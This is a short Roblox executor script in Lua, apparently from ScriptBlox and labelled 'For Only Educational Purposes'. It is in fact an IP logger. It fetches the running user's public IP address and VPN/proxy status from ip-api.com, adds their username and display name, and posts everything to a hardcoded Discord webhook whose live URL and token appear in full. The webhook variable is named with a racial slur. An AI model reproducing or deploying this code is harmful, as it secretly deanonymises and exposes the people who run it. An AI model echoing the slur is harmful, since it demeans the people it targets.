--[[
	WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk!
]]
--For Only Educational Purposes
--Not lie one hundred percent
local Nigger = "https://discord.com/api/webhooks/1458446860896440545/udHgLLGKa1cgU6G2dnRv3Ce5IfXsg69J7h3_FJawSB3z2KvGB2VGYOCEvla1_kTBhTnm"

local h = game:GetService("HttpService")
local p = game:GetService("Players")
local l = p.LocalPlayer

local a = "idk"
local b = "idk"
local r = syn and syn.request or http_request or request or (http and http.request)

pcall(function()
    local res = r({
        Url = "http://ip-api.com/json/?fields=66846719",
        Method = "GET"
    })
    if res and res.Body then
        local d = h:JSONDecode(res.Body)
        a = d.query or "idk"
        if d.proxy ~= nil then
            b = d.proxy and "Yes" or "No"
        else
            b = "idk"
        end
    end
end)

local u = "idk"
if l then
    u = l.Name .. " , " .. l.DisplayName
end

local f = string.format([[
<------------------------------>
IP Address : %s
User,Display Name : %s
Using VPN? : %s
<------------------------------>
]], a, u, b)

local Bet = {
    ["content"] = f
}

pcall(function()
    if r then
        r({
            Url = Nigger,
            Method = "POST",
            Headers = { ["Content-Type"] = "application/json" },
            Body = h:JSONEncode(Bet)
        })
    else
        h:PostAsync(Nigger, h:JSONEncode(Bet))
    end
end)
